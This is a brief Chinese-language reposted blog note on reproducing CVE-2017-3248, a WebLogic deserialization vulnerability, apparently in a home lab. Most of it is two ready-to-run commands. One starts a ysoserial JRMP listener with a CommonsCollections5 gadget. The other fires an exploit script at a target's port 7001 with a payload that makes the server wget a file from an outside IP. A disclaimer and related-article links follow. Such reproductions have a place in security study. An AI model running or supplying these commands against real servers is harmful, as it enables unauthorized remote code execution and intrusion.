CVE-2017-3248簡單復現

本文轉載自查看原文 2019-09-17 15:14 397 滲透測試

我是這樣操作的
目標跟windows在一個段,linux是另一個段的,我的虛擬機

windows主機上

`java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections5 "wget http://11.205.242.98/32.txt"

linux虛擬機上執行

python exploit-CVE-2017-3248-bobsecq.py -t 目標IP -p 7001 --jip 11.205.242.98 --jport 1099 --cmd "wget http://11.205.242.98/32.txt" --ysopath ysoserial.jar

簡單證明即可

免責聲明！

本站轉載的文章為個人學習借鑒使用，本站對版權不負任何法律責任。如果侵犯了您的隱私權益，請聯系本站郵箱yoyou2525@163.com刪除。

猜您在找 weblogic漏洞分析之CVE-2017-3248 & CVE-2018-2628 CVE-2017-3248——WebLogic反序列化漏洞利用工具 weblogic之CVE-2017-3248，CVE-2018-2628,CVE-2018-2893，CVE-2018-3245反序列繞過分析 weblogic 反序列化補丁繞過漏洞的一個批量檢測shell腳本（CVE-2017-3248 ） CVE-2017-11610漏洞復現 CVE-2017-8046 復現與分析 CVE-2017-12615漏洞復現 Vulhub漏洞CVE-2017-10271復現 CVE-2017-12617 漏洞復現 CVE-2017-0213漏洞復現